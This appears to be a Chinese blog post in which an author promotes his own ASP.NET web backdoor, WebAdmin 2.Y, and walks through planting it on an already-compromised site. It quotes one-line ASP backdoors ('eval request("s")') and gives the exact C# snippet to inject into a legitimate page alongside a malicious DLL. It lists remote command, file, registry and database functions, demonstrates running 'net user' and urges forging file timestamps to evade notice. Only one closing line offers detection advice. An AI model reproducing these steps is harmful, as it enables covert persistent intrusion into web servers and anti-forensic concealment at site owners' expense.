什麼是WebAdmin後門?
各位網友好,不知道各位有沒有用過偶的WebAdmin 2.X?嗯,對啦,就是那個ASP.Net環境下的後門。那是我不成熟的作品,要是有什麼不順手的地方還希望多多包涵。呵呵,今天呢,還是讓偶來「黃婆賣瓜自賣自誇」吧,給大家介紹一下WebAdmin的大家好,不知道各位有沒有用過偶的WebAdmin 2.X?嗯,對啦,就是那個ASP.Net環境下的後門。那是我不成熟的作品,要是有什麼不順手的地方還希望多多包涵。呵呵,今天呢,還是讓偶來「黃婆賣瓜自賣自誇」吧,給大家介紹一下WebAdmin的最新版本——WebAdmin 2.Y。
WebAdmin 2.Y功能上與2.X大致一樣,不過2.Y是C/S版本。呵呵,C/S是大勢所趨嘛。C/S的好處就是能把很短的一段代碼插入正常文件、POST方式控制不留痕迹,真是殺人滅口、居家旅行的必備良藥啊。
廢話少說,看看使用說明先。
既然是ASP.Net下的後門,當然要求ASP.Net環境。一般來說,Windows2003是默認支持的,Windows2000/XP需要安裝.Net FrameWork。
玩過ASP下C/S後門的朋友都該知道,它的C/S後門放置很簡單,就是隨便找個ASP文件添加代碼「execute request("s")」或「eval request("s")」進去就是,十分簡單。這是利用了函數execute的功能就是執行代碼,但在ASP.Net下沒有類似函數,實現C/S要複雜一點。
在ASP.Net環境下可以把代碼編譯成dll文件以提高執行效率,這個就類似ASP下的組件機制,不過這裡是不用註冊的,只需要把編譯好的dll放在網站根目錄的bin目錄之下即可調用自己開發的組件。
WebAdmin2.Y就是基於這種組件思想,服務端dll呢就是你現在看到的WebAdmin2Y.dll,這個文件端要放在被控網站Web目錄的bin子目錄之下。有些系統的Web目錄下沒有bin文件夾,那我們給它新建一個就是;代碼就包含在SampleCSharp.aspx和SampleVB.aspx里。因為ASPX文件可以用VB.Net或C#編寫,所以SampleCSharp.aspx里包含的是C#的代碼,而SampleVB.aspx就是VB.Net的代碼了。使用時根據實際情況選擇之。
那個webadmin2y.htm就是客戶端了,本地使用。界面全是英文,不要罵我崇洋媚外呀,其實主要目的是為了練練英文,呵呵,你也跟著練練吧^_^
是不是腦子裡暈乎乎的?好,下面我給個實例給大家看看這個東東到底怎麼用。
偶在本地搭建了個IIS5.1+.Net FrameWork的環境,Web目錄在E:MyWeb。我們要留後門的系統是動網新聞4.1(ASP.Net程序),它的位置是E:MyWebdvnews。動網新聞的N多dll文件在安裝的時候被要求放置在Web目錄的bin目錄下(即E:MyWebin)。
假設偶已經入侵了本地主機,現在我想用WebAdmin 2.Y留個C/S Web後門。
首先,應該把WebAdmin2Y.dll這個dll文件放到Web目錄的bin目錄下(這裡是E:MyWebin),注意名字WebAdmin2Y.dll不要亂改喲,改了就不行了。
接著我們要找個受害文件,一般是.aspx。呵呵,這裡我順手就把mail.aspx選中了(真可憐~~)。因為動網新聞是用C#寫的,所以我要用到SampleCSharp.aspx里的代碼。
現在打開文件mail.aspx,看到它的第一行是ASP.Net的頭(以「<%@」開始),這個偶們惹不起,不要動它,在它後面(ASP.Net頭之後html標記之前,這裡是第2行)插入SampleCSharp.aspx里的代碼:
<script language="C#" runat="server">
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");
</script>
這裡還要羅嗦兩句:如果你要修改的aspx文件裡面含有「<script runat="server">……</script>」標籤的話,你就不需要再複製script標籤了——因為一個aspx文件只能有一個「<script runat="server">……</script>」。編輯文件前最好備個份,小心留後門失敗把人家的網站搞砸了。
呵呵,現在後門已經留好了,偶直接訪問mail.aspx文件試試(圖1)。
在直接訪問的情況下顯示正常頁面,ok!
現在偶們運行客戶端(就是那個webadmin2y.htm,圖2)
呵呵,還是先介紹一下客戶端界面。
「The URL」就是你的後門地址啦,這裡我們應該填「http://127.0.0.1/dvnews/mail.aspx」;「Password」自然就是你的密碼了。不知道各位注意到沒有,剛才我們在mail.aspx文件留下的代碼里有個類似MD5的東東——「add6bb58e139be10」。呵呵,它就是你的密碼。這個密碼怎麼得到呢?客戶端主界面有個「Get Your Encode Password」鏈接,你點擊它就會彈出個頁面來獲取你自己的密碼(圖3)。這裡的「add6bb58e139be10」就是「webadmin」。演算法很簡單,就是取密碼的MD5值的前16位(不是該取中間16位嗎?嘿嘿,我故意的)。
「Function」就是功能列表了,這裡的功能包括ABOUT(關於)、Attributes(查看和修改文件屬性,新增的)、Command(執行CMD)、CloneTime(克隆時間)、Copy File&Folder(複製)、Database(操作MSSQL或者Access資料庫)、Delete(刪除)、Edit TextFile(編輯)、File List(列目錄)、New File&Folder(新建)、ReadReg(讀註冊表)、Rename(重命名)、SQLRootKit、Server Variable(基本信息)、UploadFile(上傳)、DownLoad File(下載)。你選擇相應的功能,填好下面的表單內容點「Send」就OK了。
比如現在我執行「net user」這個命令(圖4,圖5)
呵呵,看到結果了吧。這裡只是給大家一個演示,WebAdmin2.Y更多的功能還是需要你自己下去試哦。
嘿嘿,最後提醒一下,客戶端有個CloneTime功能,可以把某個文件的創建、最後修改時間改得跟另一個文件一樣。快用它改掉你剛才修改的文件的時間吧^_^
對管理員或者殺毒軟體來說,對付WebAdmin2.Y最簡單的辦法是檢查bin下面有沒有WebAdmin2Y.dll這個文件,但是如果貿然刪除這個dll而不恢復被改動的文件就可能會造成網站應用程序崩潰,還請管理員大叔三思而行咯。
推薦閱讀:
※前門與後門及八大大門破財風水化解
※使用Raspberry Pi Zero在鎖定的計算機中安裝後門
※英國繼續留在歐盟有哪四大後門?
TAG:後門 |